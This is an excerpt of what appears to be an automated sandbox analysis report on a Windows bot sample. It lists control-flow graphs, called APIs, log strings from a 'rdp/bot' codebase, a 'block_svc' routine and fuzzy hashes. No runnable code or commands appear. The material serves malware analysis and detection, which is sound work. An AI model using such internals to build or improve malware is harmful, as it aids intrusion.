7ff764cc18d7 395->404 406 7ff764cc18ff 396->406 407 7ff764cc1885-7ff764cc188a 396->407 409 7ff764cc1748-7ff764cc1791 strlen fopen 398->409 410 7ff764cc1728-7ff764cc1742 strcat strlen 398->410 399->398 408 7ff764cc1712-7ff764cc171f strlen 399->408 411 7ff764cc1913-7ff764cc1918 400->411 412 7ff764cc184e-7ff764cc1854 400->412 401->392 402->392 403->402 413 7ff764cc1873-7ff764cc1878 403->413 404->387 406->401 407->392 408->398 414 7ff764cc1797-7ff764cc17b3 call 7ff764cc14e2 409->414 415 7ff764cc18ad-7ff764cc18c8 call 7ff764cc14e2 409->415 410->409 411->392 416 7ff764cc188f-7ff764cc1894 412->416 417 7ff764cc1856-7ff764cc185b 412->417 413->392 414->392 422 7ff764cc191d-7ff764cc1937 call 7ff764cc14e2 414->422 415->392 416->392 417->392 422->405
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
                  • API String ID: 3395718042-2291025694
                  • Opcode ID: fdb988f6f537efc24a501cecd9faf7d516723a0c125085d3e8e56e994361fdc5
                  • Instruction ID: 1d5f0e0f002473ec15251840da7d428fd3438a0927a6de1498b093a21002da82
                  • Opcode Fuzzy Hash: fdb988f6f537efc24a501cecd9faf7d516723a0c125085d3e8e56e994361fdc5
                  • Instruction Fuzzy Hash: 53510960E0C603C1FA30BF5BA8D03B9DA55AF45744FD4A133C90E067A2DE6DB946CB61

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 425 7ff764cc5e6f-7ff764cc5e80 426 7ff764cc5f72-7ff764cc5fa0 call 7ff764cc14e2 425->426 427 7ff764cc5e86-7ff764cc5e89 425->427 439 7ff764cc5f32-7ff764cc5f35 426->439 428 7ff764cc5fa2-7ff764cc5fd0 call 7ff764cc14e2 427->428 429 7ff764cc5e8f-7ff764cc5ed4 CreateFileA 427->429 428->439 432 7ff764cc5fd5-7ff764cc5ff9 GetLastError call 7ff764cc14e2 429->432 433 7ff764cc5eda-7ff764cc5f08 LockFileEx 429->433 446 7ff764cc6013-7ff764cc6019 432->446 447 7ff764cc5ffb 432->447 437 7ff764cc60ba-7ff764cc60de GetLastError call 7ff764cc14e2 433->437 438 7ff764cc5f0e-7ff764cc5f21 433->438 458 7ff764cc60e0 437->458 459 7ff764cc60f8-7ff764cc60fe 437->459 441 7ff764cc5f27-7ff764cc5f2c 438->441 442 7ff764cc622b-7ff764cc622e CloseHandle 438->442 443 7ff764cc5f37 439->443 444 7ff764cc5f3e-7ff764cc5f4b 439->444 441->439 448 7ff764cc6245-7ff764cc625e call 7ff764cc14e2 441->448 450 7ff764cc6239 442->450 443->444 449 7ff764cc5f51-7ff764cc5f62 call 7ff764cc14e2 444->449 444->450 455 7ff764cc601f-7ff764cc6025 446->455 456 7ff764cc61a9 446->456 453 7ff764cc6001-7ff764cc600e 447->453 454 7ff764cc60b0 447->454 465 7ff764cc5f67-7ff764cc5f71 448->465 449->465 450->448 453->446 454->437 463 7ff764cc6051-7ff764cc6054 455->463 464 7ff764cc6027-7ff764cc602d 455->464 472 7ff764cc61b3 456->472 466 7ff764cc60e6-7ff764cc60f3 458->466 467 7ff764cc6195 458->467 461 7ff764cc61ef 459->461 462 7ff764cc6104-7ff764cc610a 459->462 476 7ff764cc61f9 461->476 470 7ff764cc6143-7ff764cc6149 462->470 471 7ff764cc610c-7ff764cc610f 462->471 468 7ff764cc6072-7ff764cc6078 463->468 469 7ff764cc6056-7ff764cc6059 463->469 473 7ff764cc61d1 464->473 474 7ff764cc6033-7ff764cc6039 464->474 466->459 467->456 479 7ff764cc61c7 468->479 480 7ff764cc607e 468->480 469->472 475 7ff764cc605f-7ff764cc6062 469->475 481 7ff764cc614f-7ff764cc6155 470->481 482 7ff764cc6217 470->482 477 7ff764cc6111-7ff764cc6114 471->477 478 7ff764cc612d-7ff764cc6133 471->478 486 7ff764cc61bd 472->486 484 7ff764cc61db 473->484 483 7ff764cc603f-7ff764cc6045 474->483 474->484 485 7ff764cc6068 475->485 475->486 494 7ff764cc6203 476->494 477->476 487 7ff764cc611a-7ff764cc611d 477->487 488 7ff764cc6139 478->488 489 7ff764cc620d 478->489 479->473 492 7ff764cc6088 480->492 490 7ff764cc6221 481->490 491 7ff764cc615b-7ff764cc6161 481->491 482->490 483->492 493 7ff764cc6047 483->493 484->461 485->468 486->479 487->494 495 7ff764cc6123 487->495 488->470 489->482 490->442 496 7ff764cc6163 491->496 497 7ff764cc616d 491->497 492->454 493->463 494->489 495->478 496->497 497->467
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: ErrorFileLast$CloseCreateHandleLock
                  • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
                  • API String ID: 2747014929-530486279
                  • Opcode ID: 15d915de4211def4f8d6226962a28e1180589ebbaf15e866cd92251583b9c7a8
                  • Instruction ID: 08391cee374d3325d91d7e90a91cc06e8256f617ad677ff0e3a56a1de7d77f8c
                  • Opcode Fuzzy Hash: 15d915de4211def4f8d6226962a28e1180589ebbaf15e866cd92251583b9c7a8
                  • Instruction Fuzzy Hash: 78815E60E0C70BC1FA34BF56A5C0379E2509F00355FD46233DA6E477D1EEADA9868B62

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 498 7ff764cc97f2-7ff764cc9814 499 7ff764cc98a5-7ff764cc98d3 call 7ff764cc14e2 498->499 500 7ff764cc981a-7ff764cc982d call 7ff764cc45d5 498->500 505 7ff764cc9833-7ff764cc983b 499->505 500->505 506 7ff764cc98d8-7ff764cc98e0 500->506 507 7ff764cc9854-7ff764cc9856 505->507 508 7ff764cc983d-7ff764cc984e GetProcessHeap HeapFree 505->508 509 7ff764cc98e6-7ff764cc9900 506->509 510 7ff764cc9b7e-7ff764cc9b83 506->510 511 7ff764cc985c-7ff764cc985f 507->511 512 7ff764cc9b9e-7ff764cc9baf call 7ff764cc14e2 507->512 508->507 513 7ff764cc9933-7ff764cc993a 509->513 510->505 514 7ff764cc9861 511->514 515 7ff764cc9869-7ff764cc9876 511->515 519 7ff764cc9bb4 call 7ff764cc14e2 512->519 517 7ff764cc993c-7ff764cc993f 513->517 518 7ff764cc995d-7ff764cc9998 GetProcessHeap HeapAlloc 513->518 514->515 520 7ff764cc9b92 515->520 521 7ff764cc987c-7ff764cc98a4 call 7ff764cc14e2 515->521 517->518 522 7ff764cc9941-7ff764cc9947 517->522 523 7ff764cc99d0-7ff764cc99e6 call 7ff764cc14e2 518->523 524 7ff764cc999a-7ff764cc99a1 518->524 520->512 526 7ff764cc9918-7ff764cc991b 522->526 527 7ff764cc9949 522->527 523->524 528 7ff764cc99a7-7ff764cc99ce 524->528 529 7ff764cc9b88-7ff764cc9b8d 524->529 532 7ff764cc992f 526->532 533 7ff764cc991d-7ff764cc9927 526->533 535 7ff764cc9902-7ff764cc9905 527->535 536 7ff764cc994b-7ff764cc994e 527->536 537 7ff764cc9a2a-7ff764cc9a37 528->537 529->505 532->513 533->532 535->532 541 7ff764cc9907-7ff764cc990a 535->541 538 7ff764cc9950-7ff764cc9953 536->538 539 7ff764cc9929 536->539 537->505 540 7ff764cc9a3d-7ff764cc9a40 537->540 538->532 542 7ff764cc9955-7ff764cc995b 538->542 539->532 540->505 543 7ff764cc9a46-7ff764cc9a4b 540->543 541->532 544 7ff764cc990c-7ff764cc9916 541->544 542->532 545 7ff764cc9a51-7ff764cc9a53 543->545 546 7ff764cc9b6e-7ff764cc9b74 543->546 544->532 547 7ff764cc9a55-7ff764cc9a57 545->547 548 7ff764cc99e8-7ff764cc99eb 545->548 546->510 549 7ff764cc9a26 547->549 551 7ff764cc9a59-7ff764cc9a5c 547->551 548->549 550 7ff764cc99ed-7ff764cc99f1 548->550 549->537 550->549 552 7ff764cc9a1c-7ff764cc9a20 551->552 553 7ff764cc9a5e-7ff764cc9a61 551->553 552->549 554 7ff764cc99f3-7ff764cc9a11 call 7ff764cc9770 553->554 555 7ff764cc9a63-7ff764cc9aa2 call 7ff764cc9770 * 2 553->555 554->552 561 7ff764cc9a13-7ff764cc9a16 554->561 555->552 564 7ff764cc9aa8-7ff764cc9aad 555->564 561->552 563 7ff764cc9af8-7ff764cc9b00 561->563 563->552 565 7ff764cc9b06-7ff764cc9b09 563->565 564->552 566 7ff764cc9ab3-7ff764cc9af3 strncpy * 2 564->566 567 7ff764cc9b0b-7ff764cc9b21 565->567 568 7ff764cc9b59-7ff764cc9b6c 565->568 566->552 569 7ff764cc9b28-7ff764cc9b54 strncpy 567->569 568->569 569->552
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                  • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                  • API String ID: 1423203057-2746879330
                  • Opcode ID: 625e14a2c0319edb11a8671c5d5937e69af5c2f16708fc5f91877772a9fd1444
                  • Instruction ID: a2d9d84402f83249a84c3b261d1eec559e15f2216c0b17135afb400dda309057
                  • Opcode Fuzzy Hash: 625e14a2c0319edb11a8671c5d5937e69af5c2f16708fc5f91877772a9fd1444
                  • Instruction Fuzzy Hash: DAA19D62A0D686D1EF30AF07E4907B9AB61EF41788FC86033DA4D47795DE6CE545CB20

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 701 7ff764cc9195-7ff764cc919a 702 7ff764cc90e4-7ff764cc90ec 701->702 703 7ff764cc8e63-7ff764cc8e6b 702->703 704 7ff764cc90f2-7ff764cc9109 GetProcessHeap HeapFree 702->704 705 7ff764cc8e72-7ff764cc8e82 703->705 704->703 707 7ff764cc8da0-7ff764cc8da3 705->707 708 7ff764cc8e88-7ff764cc8e8a 705->708 710 7ff764cc9284-7ff764cc9299 707->710 711 7ff764cc8da9-7ff764cc8db2 FreeLibrary 707->711 708->707 709 7ff764cc8e90-7ff764cc8eca call 7ff764cca1f1 708->709 709->705 714 7ff764cc8ecc-7ff764cc8f29 strlen 709->714 711->710 716 7ff764cc8f2f-7ff764cc8f5e 714->716 717 7ff764cc8e2e-7ff764cc8e49 call 7ff764cc14e2 714->717 721 7ff764cc8f64-7ff764cc8f8d GetProcessHeap HeapAlloc 716->721 722 7ff764cc8e4b-7ff764cc8e5e call 7ff764cc14e2 716->722 717->705 724 7ff764cc8f93-7ff764cc8fac 721->724 725 7ff764cc90a4-7ff764cc90c4 call 7ff764cc14e2 721->725 722->703 730 7ff764cc8fb2-7ff764cc9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 724->730 731 7ff764cc90c9-7ff764cc90df call 7ff764cc14e2 724->731 725->703 733 7ff764cc906d-7ff764cc9086 call 7ff764cc14e2 730->733 734 7ff764cc91a9-7ff764cc91da call 7ff764cc795a 730->734 731->702 742 7ff764cc908c 733->742 743 7ff764cc910e-7ff764cc9114 733->743 740 7ff764cc91ef-7ff764cc9205 call 7ff764cc14e2 734->740 741 7ff764cc91dc-7ff764cc91ea LocalFree 734->741 740->741 741->702 747 7ff764cc919f-7ff764cc91a4 742->747 748 7ff764cc9092-7ff764cc909f 742->748 744 7ff764cc9211-7ff764cc9216 743->744 745 7ff764cc911a-7ff764cc9120 743->745 744->702 749 7ff764cc9153-7ff764cc9159 745->749 750 7ff764cc9122-7ff764cc9125 745->750 747->702 748->702 752 7ff764cc915f-7ff764cc9165 749->752 753 7ff764cc9239-7ff764cc923e 749->753 754 7ff764cc9140-7ff764cc9146 750->754 755 7ff764cc9127-7ff764cc912a 750->755 756 7ff764cc9243-7ff764cc9248 752->756 757 7ff764cc916b-7ff764cc9171 752->757 753->702 760 7ff764cc922f-7ff764cc9234 754->760 761 7ff764cc914c-7ff764cc9151 754->761 758 7ff764cc9130-7ff764cc9133 755->758 759 7ff764cc921b-7ff764cc9220 755->759 756->702 762 7ff764cc924d-7ff764cc9252 757->762 763 7ff764cc9177-7ff764cc917c 757->763 764 7ff764cc9225-7ff764cc922a 758->764 765 7ff764cc9139-7ff764cc913e 758->765 759->702 760->702 761->702 762->702 763->702 764->702 765->702
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                  • API String ID: 493744553-3317923414
                  • Opcode ID: 7a2bc89e0e95705e93dc6a483fc78728a0ae83035528600c77e8b8795ebba7cf
                  • Instruction ID: f7284d07c7bb589596ae140daeb30d627c7636cd539368a5e2d333638218a1cf
                  • Opcode Fuzzy Hash: 7a2bc89e0e95705e93dc6a483fc78728a0ae83035528600c77e8b8795ebba7cf
                  • Instruction Fuzzy Hash: FE514C22608BC2C5EB709F16E4843AAB7A0FB84748F805136CA8D43B98EF7DD549CB50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 636 7ff764cc918b-7ff764cc9190 637 7ff764cc90e4-7ff764cc90ec 636->637 638 7ff764cc8e63-7ff764cc8e6b 637->638 639 7ff764cc90f2-7ff764cc9109 GetProcessHeap HeapFree 637->639 640 7ff764cc8e72-7ff764cc8e82 638->640 639->638 642 7ff764cc8da0-7ff764cc8da3 640->642 643 7ff764cc8e88-7ff764cc8e8a 640->643 645 7ff764cc9284-7ff764cc9299 642->645 646 7ff764cc8da9-7ff764cc8db2 FreeLibrary 642->646 643->642 644 7ff764cc8e90-7ff764cc8eca call 7ff764cca1f1 643->644 644->640 649 7ff764cc8ecc-7ff764cc8f29 strlen 644->649 646->645 651 7ff764cc8f2f-7ff764cc8f5e 649->651 652 7ff764cc8e2e-7ff764cc8e49 call 7ff764cc14e2 649->652 656 7ff764cc8f64-7ff764cc8f8d GetProcessHeap HeapAlloc 651->656 657 7ff764cc8e4b-7ff764cc8e5e call 7ff764cc14e2 651->657 652->640 659 7ff764cc8f93-7ff764cc8fac 656->659 660 7ff764cc90a4-7ff764cc90c4 call 7ff764cc14e2 656->660 657->638 665 7ff764cc8fb2-7ff764cc9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 659->665 666 7ff764cc90c9-7ff764cc90df call 7ff764cc14e2 659->666 660->638 668 7ff764cc906d-7ff764cc9086 call 7ff764cc14e2 665->668 669 7ff764cc91a9-7ff764cc91da call 7ff764cc795a 665->669 666->637 677 7ff764cc908c 668->677 678 7ff764cc910e-7ff764cc9114 668->678 675 7ff764cc91ef-7ff764cc9205 call 7ff764cc14e2 669->675 676 7ff764cc91dc-7ff764cc91ea LocalFree 669->676 675->676 676->637 682 7ff764cc919f-7ff764cc91a4 677->682 683 7ff764cc9092-7ff764cc909f 677->683 679 7ff764cc9211-7ff764cc9216 678->679 680 7ff764cc911a-7ff764cc9120 678->680 679->637 684 7ff764cc9153-7ff764cc9159 680->684 685 7ff764cc9122-7ff764cc9125 680->685 682->637 683->637 687 7ff764cc915f-7ff764cc9165 684->687 688 7ff764cc9239-7ff764cc923e 684->688 689 7ff764cc9140-7ff764cc9146 685->689 690 7ff764cc9127-7ff764cc912a 685->690 691 7ff764cc9243-7ff764cc9248 687->691 692 7ff764cc916b-7ff764cc9171 687->692 688->637 695 7ff764cc922f-7ff764cc9234 689->695 696 7ff764cc914c-7ff764cc9151 689->696 693 7ff764cc9130-7ff764cc9133 690->693 694 7ff764cc921b-7ff764cc9220 690->694 691->637 697 7ff764cc924d-7ff764cc9252 692->697 698 7ff764cc9177-7ff764cc917c 692->698 699 7ff764cc9225-7ff764cc922a 693->699 700 7ff764cc9139-7ff764cc913e 693->700 694->637 695->637 696->637 697->637 698->637 699->637 700->637
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                  • API String ID: 493744553-3317923414
                  • Opcode ID: f5ade81bab610ed3c45f77ecbc0485a539bdfa577f56cbaabe67d1e6d3cacaf8
                  • Instruction ID: be61216980e517508a2c330d7726f835e91da7e5e9b54f42cdb270e489f17747
                  • Opcode Fuzzy Hash: f5ade81bab610ed3c45f77ecbc0485a539bdfa577f56cbaabe67d1e6d3cacaf8
                  • Instruction Fuzzy Hash: 2D514C32608BC2C5EB709F16E4843AAB7A0FB84749F805136CA8D43B98EF7DD549CB50

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 571 7ff764cc9181-7ff764cc9186 572 7ff764cc90e4-7ff764cc90ec 571->572 573 7ff764cc8e63-7ff764cc8e6b 572->573 574 7ff764cc90f2-7ff764cc9109 GetProcessHeap HeapFree 572->574 575 7ff764cc8e72-7ff764cc8e82 573->575 574->573 577 7ff764cc8da0-7ff764cc8da3 575->577 578 7ff764cc8e88-7ff764cc8e8a 575->578 580 7ff764cc9284-7ff764cc9299 577->580 581 7ff764cc8da9-7ff764cc8db2 FreeLibrary 577->581 578->577 579 7ff764cc8e90-7ff764cc8eca call 7ff764cca1f1 578->579 579->575 584 7ff764cc8ecc-7ff764cc8f29 strlen 579->584 581->580 586 7ff764cc8f2f-7ff764cc8f5e 584->586 587 7ff764cc8e2e-7ff764cc8e49 call 7ff764cc14e2 584->587 591 7ff764cc8f64-7ff764cc8f8d GetProcessHeap HeapAlloc 586->591 592 7ff764cc8e4b-7ff764cc8e5e call 7ff764cc14e2 586->592 587->575 594 7ff764cc8f93-7ff764cc8fac 591->594 595 7ff764cc90a4-7ff764cc90c4 call 7ff764cc14e2 591->595 592->573 600 7ff764cc8fb2-7ff764cc9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 594->600 601 7ff764cc90c9-7ff764cc90df call 7ff764cc14e2 594->601 595->573 603 7ff764cc906d-7ff764cc9086 call 7ff764cc14e2 600->603 604 7ff764cc91a9-7ff764cc91da call 7ff764cc795a 600->604 601->572 612 7ff764cc908c 603->612 613 7ff764cc910e-7ff764cc9114 603->613 610 7ff764cc91ef-7ff764cc9205 call 7ff764cc14e2 604->610 611 7ff764cc91dc-7ff764cc91ea LocalFree 604->611 610->611 611->572 617 7ff764cc919f-7ff764cc91a4 612->617 618 7ff764cc9092-7ff764cc909f 612->618 614 7ff764cc9211-7ff764cc9216 613->614 615 7ff764cc911a-7ff764cc9120 613->615 614->572 619 7ff764cc9153-7ff764cc9159 615->619 620 7ff764cc9122-7ff764cc9125 615->620 617->572 618->572 622 7ff764cc915f-7ff764cc9165 619->622 623 7ff764cc9239-7ff764cc923e 619->623 624 7ff764cc9140-7ff764cc9146 620->624 625 7ff764cc9127-7ff764cc912a 620->625 626 7ff764cc9243-7ff764cc9248 622->626 627 7ff764cc916b-7ff764cc9171 622->627 623->572 630 7ff764cc922f-7ff764cc9234 624->630 631 7ff764cc914c-7ff764cc9151 624->631 628 7ff764cc9130-7ff764cc9133 625->628 629 7ff764cc921b-7ff764cc9220 625->629 626->572 632 7ff764cc924d-7ff764cc9252 627->632 633 7ff764cc9177-7ff764cc917c 627->633 634 7ff764cc9225-7ff764cc922a 628->634 635 7ff764cc9139-7ff764cc913e 628->635 629->572 630->572 631->572 632->572 633->572 634->572 635->572
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
                  • String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
                  • API String ID: 493744553-3317923414
                  • Opcode ID: c122462ddc06ce98c00caf7f9bdd7b611d9b43429d298ccdaf14c786086906bd
                  • Instruction ID: e4b98b5151020daedcbc15938a648658a3c4716596ad2bc182502622a63c67dc
                  • Opcode Fuzzy Hash: c122462ddc06ce98c00caf7f9bdd7b611d9b43429d298ccdaf14c786086906bd
                  • Instruction Fuzzy Hash: 80514C32608BC2C5EB709F16E4843AAB7A0FB84748F805136CA8D43B98EF7DD549CB51

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                  • API String ID: 1004003707-3780280517
                  • Opcode ID: 77dca7da4658c8b5d52ea4299f8eeec008c0d1c2f296eb3cde6d171fa38a49ae
                  • Instruction ID: 96629eff1e229a9dd81ffe2559297efabf5d31c8f9b0f326a99135fdd3ed61f7
                  • Opcode Fuzzy Hash: 77dca7da4658c8b5d52ea4299f8eeec008c0d1c2f296eb3cde6d171fa38a49ae
                  • Instruction Fuzzy Hash: 1D412762A08647E1FA24AF43E9807B5A260FF50348FD8503BDA4D0A795DF3CE646CB64

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: strcmp
                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                  • API String ID: 1004003707-386092548
